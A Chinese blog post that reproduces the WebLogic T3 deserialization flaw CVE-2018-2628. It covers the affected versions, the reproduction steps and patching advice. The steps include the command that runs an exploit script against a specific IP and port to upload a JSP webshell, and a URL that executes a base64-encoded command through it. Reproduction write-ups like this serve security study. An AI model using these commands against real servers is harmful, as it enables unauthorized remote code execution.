weblogic 反序列化 (CVE-2018-2628)漏洞复现

wuchangjian2021-11-01 23:19:06编程学习

weblogic 反序列化 (CVE-2018-2628)

前言

Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务器,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。

0x01 漏洞描述

WLS Core是其中的一个核心组件。 攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。

0x02 影响范围

Oracle Weblogic Server10.3.6.0.0

Oracle Weblogic Server12.1.3.0.0

Oracle Weblogic Server12.2.1.2.0

Oracle Weblogic Server12.2.1.3.0

0x03 漏洞复现

cve-2018-2628_webshell.py脚本

python2 运行
(1) 查看用法
python2 cve-2018-2628_webshell.py

在这里插入图片描述

(2) exp 上传webshell

python2 cve-2018-2628_webshell.py 118.193.36.37 41797 shell1.jsp

在这里插入图片描述
(3) 执行命令
tom=命令(base64加密)

http://118.193.36.37:41797/bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg==

在这里插入图片描述

0x04 漏洞修复

关闭T3服务,或控制T3服务的访问权限。
打补丁。

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。